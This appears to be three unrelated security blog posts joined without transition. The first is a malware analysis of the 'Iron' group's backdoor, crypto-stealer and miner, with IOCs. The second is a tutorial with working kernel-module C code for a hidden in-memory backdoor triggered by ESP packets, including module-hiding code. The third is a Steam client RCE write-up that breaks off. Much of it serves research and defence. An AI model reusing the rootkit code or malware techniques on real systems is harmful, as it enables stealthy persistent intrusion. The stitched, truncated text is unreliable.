Iron Group’s Malware using HackingTeam’s Leaked RCS source code with VMProtected Installer — Technical Analysis

In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code. We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.

During the past year and a half, the Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.

In this technical blog post we are going to take a look at the malware samples found during the research.

Technical Analysis:

Installer:

** This installer sample (and in general most of the samples found) is protected with VMProtect then compressed using UPX.

Installation process:

1. Check if the binary is executed on a VM, if so – ExitProcess

2. Drop & Install malicious chrome extension
%localappdata%\Temp\chrome.crx
3. Extract malicious chrome extension to %localappdata%\Temp\chrome & create a scheduled task to execute %localappdata%\Temp\chrome\sec.vbs.
4. Create mutex using the CPU’s version to make sure there’s no existing running instance of itself.
5. Drop backdoor dll to %localappdata%\Temp\\<random>.dat.
6. Check OS version:
.If Version == Windows XP then just invoke ‘Launch’ export of Iron Backdoor for a one-time non persistent execution.
.If Version > Windows XP
-Invoke ‘Launch’ export
-Check if Qhioo360 – only if not proceed, Install malicious certificate used to sign Iron Backdoor binary as root CA.Then create a service called ‘helpsvc’ pointing back to Iron Backdoor dll.

Using the leaked HackingTeam source code:

Once we Analyzed the backdoor sample, we immediately noticed it’s partially based on HackingTeam’s source code for their Remote Control System hacking tool, which leaked about 3 years ago. Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam’s source in both IronStealer and Iron ransomware.

1.Anti-VM: Iron Backdoor uses a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant leaked source code. This piece of code supports detecting Cuckoo Sandbox, VMWare product & Oracle’s VirtualBox. Screenshot:

 

2. Dynamic Function Calls: Iron Backdoor is also using the DynamicCall module from HackingTeam’s “core” library. This module is used to dynamically call external library function by obfuscated the function name, which makes static analysis of this malware more complex.
In the following screenshot you can see obfuscated “LFSOFM43/EMM” and “DsfbufGjmfNbqqjohB”, which represents “kernel32.dll” and “CreateFileMappingA” API.

For a full list of obfuscated APIs you can visit obfuscated_calls.h.

Malicious Chrome extension:

A patched version of the popular Adblock Plus chrome extension is used to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.


**patched include.preload.js injects two malicious scripts from the attacker’s Pastebin account.

The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it as you can see in the following screenshot:

Internet Explorer(deprecated):

Iron Backdoor itself embeds adblockplusie – Adblock Plus for IE, which is modified in a similar way to the malicious chrome extension, injecting remote javascript. It seems that this functionality is no longer automatically used for some unknown reason.

Persistence:

Before installing itself as a Windows service, the malware checks for the presence of either 360 Safe Guard or 360 Internet Security by reading following registry keys:

.SYSTEM\CurrentControlSet\Services\zhudongfangyu.
.SYSTEM\CurrentControlSet\Services\360rp

If one of these products is installed, the malware will only run once without persistence. Otherwise, the malware will proceed to installing rouge, hardcoded root CA certificate on the victim’s workstation. This fake root CA supposedly signed the malware’s binaries, which will make them look legitimate.

Comic break: The certificate is protected by the password ‘caonima123’, which means “f*ck your mom” in Mandarin.

IronStealer (<RANDOM>.dat):

Persistent backdoor, dropper and cryptocurrency theft module.

1. Load Cobalt Strike beacon:
The malware automatically decrypts hard coded shellcode stage-1, which in turn loads Cobalt Strike beacon in-memory, using a reflective loader:

Beacon: hxxp://dazqc4f140wtl.cloudfront[.]net/ZZYO

2. Drop & Execute payload: The payload URL is fetched from a hardcoded Pastebin paste address:

We observed two different payloads dropped by the malware:

1. Xagent – A variant of “JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms. JbossMiner is using known database vulnerabilities to spread. “Xagent” is the original filename Xagent<VER>.exe whereas <VER> seems to be the version of the worm. The last version observed was version 6 (Xagent6.exe).

**Xagent versions 4-6 as seen by VT

2. Iron ransomware – We recently saw a shift from dropping Xagent to dropping Iron ransomware. It seems that the wallet & payment portal addresses are identical to the ones that Bart observed. Requested ransom decreased from 0.2 BTC to 0.05 BTC, most likely due to the lack of payment they received.

**Nobody paid so they decreased ransom to 0.05 BTC

3. Stealing cryptocurrency from the victim’s workstation: Iron backdoor would drop the latest voidtool Everything search utility and actually silent install it on the victim’s workstation using msiexec. After installation was completed, Iron Backdoor uses Everything in order to find files that are likely to contain cryptocurrency wallets, by filename patterns in both English and Chinese.

Full list of patterns extracted from sample:
– Wallet.dat
– UTC–
– Etherenum keystore filename
– *bitcoin*.txt
– *比特币*.txt
– “Bitcoin”
– *monero*.txt
– *门罗币*.txt
– “Monroe Coin”
– *litecoin*.txt
– *莱特币*.txt
– “Litecoin”
– *Ethereum*.txt
– *以太币*.txt
– “Ethereum”
– *miner*.txt
– *挖矿*.txt
– “Mining”
– *blockchain*.txt
– *coinbase*

4. Hijack on-going payments in cryptocurrency: IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account:

Pastebin Account:

As part of the investigation, we also tried to figure out what additional information we may learn from the attacker’s Pastebin account:

The account was probably created using the mail fineisgood123@gmail[.]com – the same email address used to register blockbitcoin[.]com (the attacker’s crypto-mining pool & malware host) and swb[.]one (Old server used to host malware & leaked files. replaced by u.cacheoffer[.]tk):

1. Index.html: HTML page referring to a fake Firefox download page.
2. crystal_ext-min + angular: JS inject using malicious Chrome extension.
3. android: This paste holds a command line for an unknown backdoored application to execute on infected Android devices. This command line invokes remote Metasploit stager (android.apk) and drops cpuminer 2.3.2 (minerd.txt) built for ARM processor. Considering the last update date (18/11/17) and the low number of views, we believe this paste is obsolete.

4. androidminer: Holds the cpuminer command line to execute for unknown malicious android applications, at the time of writing this post, this paste received nearly 2000 hits.

Aikapool[.]com is a public mining pool and port 7915 is used for DogeCoin:

The username (myapp2150) was used to register accounts in several forums and on Reddit. These accounts were used to advertise fake “blockchain exploit tool”, which infects the victim’s machine with Cobalt Strike, using a similar VBScript to the one found by Malwrologist (ps5.sct).

XAttacker: Copy of XAttacker PHP remote file upload script.
miner: Holds payload URL, as mentioned above (IronStealer).

FAQ:

How many victims are there?
It is hard to define for sure, , but to our knowledge, the total of the attacker’s pastes received around 14K views, ~11K for dropped payload URL and ~2k for the android miner paste. Based on that, we estimate that the group has successfully infected, a few thousands victims.

Who is Iron group?
We suspect that the person or persons behind the group are Chinese, due in part to the following findings:
. There were several leftover comments in the plugin in Chinese.
. Root CA Certificate password (‘f*ck your mom123’ was in Mandarin)
We also suspect most of the victims are located in China, because of the following findings:
. Searches for wallet file names in Chinese on victims’ workstations.
. Won’t install persistence if Qhioo360(popular Chinese AV) is found

IOCS:

 

  • blockbitcoin[.]com
  • pool.blockbitcoin[.]com
  • ssl2.blockbitcoin[.]com
  • xmr.enjoytopic[.]tk
  • down.cacheoffer[.]tk
  • dzebppteh32lz.cloudfront[.]net
  • dazqc4f140wtl.cloudfront[.]net
  • androidapt.s3-accelerate.amazonaws[.]com
  • androidapt.s3-accelerate.amazonaws[.]com
  • winapt.s3-accelerate.amazonaws[.]com
  • swb[.]one
  • bitcoinwallet8[.]com
  • blockchaln[.]info
  • 6350a42d423d61eb03a33011b6054fb7793108b7e71aee15c198d3480653d8b7
  • a4faaa0019fb63e55771161e34910971fd8fe88abda0ab7dd1c90cfe5f573a23
  • ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9
  • 654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190
  • 980a39b6b72a7c8e73f4b6d282fae79ce9e7934ee24a88dde2eead0d5f238bda
  • 39a991c014f3093cdc878b41b527e5507c58815d95bdb1f9b5f90546b6f2b1f6
  • a3c8091d00575946aca830f82a8406cba87aa0b425268fa2e857f98f619de298
  • 0f7b9151f5ff4b35761d4c0c755b6918a580fae52182de9ba9780d5a1f1beee8
  • ea338755e8104d654e7d38170aaae305930feabf38ea946083bb68e8d76a0af3
  • 4de16be6a9de62b1ff333dd94e63128e677eb6a52d9fbbe55d8a09a2cab161f1
  • 92b4eed5d17cb9892a9fe146d61787025797e147655196f94d8eaf691c34be8c
  • 6314162df5bc2db1200d20221641abaac09ac48bc5402ec29191fd955c55f031
  • 7f3c07454dab46b27e11fcefd0101189aa31e84f8498dcb85db2b010c02ec190
  • 927e61b57c124701f9d22abbc72f34ebe71bf1cd717719f8fc6008406033b3e9
  • f1cbacea1c6d05cd5aa6fc9532f5ead67220d15008db9fa29afaaf134645e9de
  • 1d34a52f9c11d4bf572bf678a95979046804109e288f38dfd538a57a12fc9fd1
  • 2f5fb4e1072044149b32603860be0857227ed12cde223b5be787c10bcedbc51a
  • 0df1105cbd7bb01dca7e544fb22f45a7b9ad04af3ffaf747b5ecc2ffcd8c6dee
  • 388c1aecdceab476df8619e2d722be8e5987384b08c7b810662e26c42caf1310
  • 0b8473d3f07a29820f456b09f9dc28e70af75f9dec88668fb421a315eec9cb63
  • 251345b721e0587f1f08f54a81e26abac075acf3c4473a2c3ba8efcedc3b2459
  • b1fe223cbb01ff2a658c8ff51d386b5df786fd36278ee081c714adf946145047
  • 2886e25a86a57355a8a09a84781a9b032de10c3e40339a9ad0c10b63f7f8e7c7
  • 1d17eb102e75c08ab6f54387727b12ec9f9ee1960c8e5dc7f9925d41a943cabf
  • 5831dabe27e0211028296546d4e637770fd1ec5f2c8c5add51d0ea09b6ea3f0d
  • 85b0d44f3e8fd636a798960476a1f71d6fe040fbe44c92dfa403d0d014ff66cc
  • 936f4ce3570017ef5db14fb68f5e775a417b65f3b07094475798f24878d84907
  • 484b4cd953c9993090947fbb31626b76d7eee60c106867aa17e408556d27b609
  • 1cbd51d387561cafddf10699177a267cd5d2d184842bb43755a0626fdc4f0f3c
  • e41a805d780251cb591bcd02e5866280f8a99f876cfa882b557951e30dfdd142
  • b8107197469839a82cae25c3d3b5c25b5c0784736ca3b611eb3e8e3ced8ec950
  • b0442643d321003af965f0f41eb90cff2a198d11b50181ef8b6f530dd22226a7
  • 657a3a4a78054b8d6027a39a5370f26665ee10e46673a1f4e822a2a31168e5f9
  • 5977bee625ed3e91c7f30b09be9133c5838c59810659057dcfd1a5e2cf7c1936
  • 9ea69b49b6707a249e001b5f2caaab9ee6f6f546906445a8c51183aafe631e9f
  • 283536c26bb4fd4ea597d59c77a84ab812656f8fe980aa8556d44f9e954b1450
  • 21f1a867fa6a418067be9c68d588e2eeba816bffcb10c9512f3b7927612a1221
  • 45f794304919c8aa9282b0ee84c198703a41cc2254fe93634642ada3511239d2
  • 70e47fdff286fdfe031d05488bc727f5df257eacaa0d29431fb69ce680f6fb0c
  • ce7161381a0a0495ef998b5e202eb3e8fa2945dfdba0fd2a612d68b986c92678
  • b8d548ab2a1ce0cf51947e63b37fe57a0c9b105b2ef36b0abc1abf26d848be00
  • 74e777af58a8ee2cff4f9f18013e5b39a82a4c4f66ea3e17d06e5356085265b7
  • cd4d1a6b3efb3d280b8d4e77e306e05157f6ef8a226d7db08ac2006cce95997c
  • 78a07502443145d762536afaabd4d6139b81ca3cc9f8c28427ec724a3107e17b
  • 729ab4ff5da471f210a8658f4a7b2a30522534a212ac44e4d76f258baab19ccb
  • ca0df32504d3cf78d629e33b055213df5f71db3d5a0313ebc07fe2c05e506826
  • fc9d150d1a7cbda2600e4892baad91b9a4b8c52d31a41fd686c21c7801d1dd8c
  • bf2984b866c449a8460789de5871864eec19a7f9cadd7d883898135a4898a38a
  • 9d817d77b651d2627e37c01037e13808e1047f9528799a435c7bc04e877d70b3
  • 8fdec2e23032a028b8bd326dc709258a2f705c605f6222fc0c1616912f246f91
  • dbe165a63ed14e6c9bdcd314cf54d173e68db9d36623b09057d0a4d0519f1306
  • 64f96042ab880c0f2cd4c39941199806737957860387a65939b656d7116f0c7e
  • e394b1a1561c94621dbd63f7b8ea7361485a1f903f86800d50bd7e27ad801a5f
  • 506647c5bfad858ff6c34f93c74407782abbac4da572d9f44112fee5238d9ae1
  • 194362ce71adcdfa0fe976322a7def8bb2d7fb3d67a44716aa29c2048f87f5bc
  • 3652ea75ce5d8cfa0000a40234ae3d955781bcb327eecfee8f0e2ecae3a82870
  • 97d41633e74eccf97918d248b344e62431b74c9447032e9271ed0b5340e1dba0
  • a8ab5be12ca80c530e3ef5627e97e7e38e12eaf968bf049eb58ccc27f134dc7f
  • 37bea5b0a24fa6fed0b1649189a998a0e51650dd640531fe78b6db6a196917a7
  • 7e750be346f124c28ddde43e87d0fbc68f33673435dddb98dda48aa3918ce3bd
  • fcb700dbb47e035f5379d9ce1ada549583d4704c1f5531217308367f2d4bd302
  • b638dcce061ed2aa5a1f2d56fc5e909aa1c1a28636605a3e4c0ad72d49b7aec6
  • f2e4528049f598bdb25ce109a669a1f446c6a47739320a903a9254f7d3c69427
  • afd7ab6b06b87545c3a6cdedfefa63d5777df044d918a505afe0f57179f246e9
  • 9b654fd24a175784e3103d83eba5be6321142775cf8c11c933746d501ca1a5a1
  • e6c717b06d7ded23408461848ad0ee734f77b17e399c6788e68bc15219f155d7
  • e302aa06ad76b7e26e7ba2c3276017c9e127e0f16834fb7c8deae2141db09542
  • d020ea8159bb3f99f394cd54677e60fadbff2b91e1a2e91d1c43ba4d7624244d
  • 36104d9b7897c8b550a9fad9fe2f119e16d82fb028f682d39a73722822065bd3
  • d20cd3e579a04c5c878b87cc7bd6050540c68fdd8e28f528f68d70c77d996b16
  • ee859581b2fcea5d4ff633b5e40610639cd6b11c2b4fc420720198f49fbd1d31
  • ef2c384c795d5ca8ce17394e278b5c98f293a76047a06fc672da38bb56756aec
  • bd56db8d304f36af7cb0380dcbbc3c51091e3542261affb6caac18fa6a6988ec
  • 086d989f14e14628af821b72db00d0ef16f23ba4d9eaed2ec03d003e5f3a96a1
  • f44c3fd546b8c74cc58630ebcb5bea417696fac4bb89d00da42202f40da31354
  • 320bb1efa1263c636702188cd97f68699aebbb88c2c2c92bf97a68e689fa6f89
  • 42faf3af09b955de1aead2b99a474801b2c97601a52541af59d35711fafb7c6d
  • 6e0adfd1e30c116210f469d76e60f316768922df7512d40d5faf65820904821b
  • eea2d72f3c9bed48d4f5c5ad2bef8b0d29509fc9e650655c6c5532cb39e03268
  • 1a31e09a2a982a0fedd8e398228918b17e1bde6b20f1faf291316e00d4a89c61
  • 042efe5c5226dd19361fb832bdd29267276d7fa7a23eca5ced3c2bb7b4d30f7d
  • 274717d4a4080a6f2448931832f9eeb91cc0cbe69ff65f2751a9ace86a76e670
  • f8751a004489926ceb03321ea3494c54d971257d48dadbae9e8a3c5285bd6992
  • d5a296bac02b0b536342e8fb3b9cb40414ea86aa602353bc2c7be18386b13094
  • 49cfeb6505f0728290286915f5d593a1707e15effcfb62af1dd48e8b46a87975
  • 5f2b13cb2e865bb09a220a7c50acc3b79f7046c6b83dbaafd9809ecd00efc49a
  • 5a5bbc3c2bc2d3975bc003eb5bf9528c1c5bf400fac09098490ea9b5f6da981f
  • 2c025f9ffb7d42fcc0dc8d056a444db90661fb6e38ead620d325bee9adc2750e
  • aaa6ee07d1c777b8507b6bd7fa06ed6f559b1d5e79206c599a8286a0a42fe847
  • ac89400597a69251ee7fc208ad37b0e3066994d708e15d75c8b552c50b57f16a
  • a11bf4e721d58fcf0f44110e17298f6dc6e6c06919c65438520d6e90c7f64d40
  • 017bdd6a7870d120bd0db0f75b525ddccd6292a33aee3eecf70746c2d37398bf
  • ae366fa5f845c619cacd583915754e655ad7d819b64977f819f3260277160141
  • 9b40a0cd49d4dd025afbc18b42b0658e9b0707b75bb818ab70464d8a73339d52
  • 57daa27e04abfbc036856a22133cbcbd1edb0662617256bce6791e7848a12beb
  • 6c54b73320288c11494279be63aeda278c6932b887fc88c21c4c38f0e18f1d01
  • ba644e050d1b10b9fd61ac22e5c1539f783fe87987543d76a4bb6f2f7e9eb737
  • 21a83eeff87fba78248b137bfcca378efcce4a732314538d2e6cd3c9c2dd5290
  • 2566b0f67522e64a38211e3fe66f340daaadaf3bcc0142f06f252347ebf4dc79
  • 692ae8620e2065ad2717a9b7a1958221cf3fcb7daea181b04e258e1fc2705c1e
  • 426bc7ffabf01ebfbcd50d34aecb76e85f69e3abcc70e0bcd8ed3d7247dba76e

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

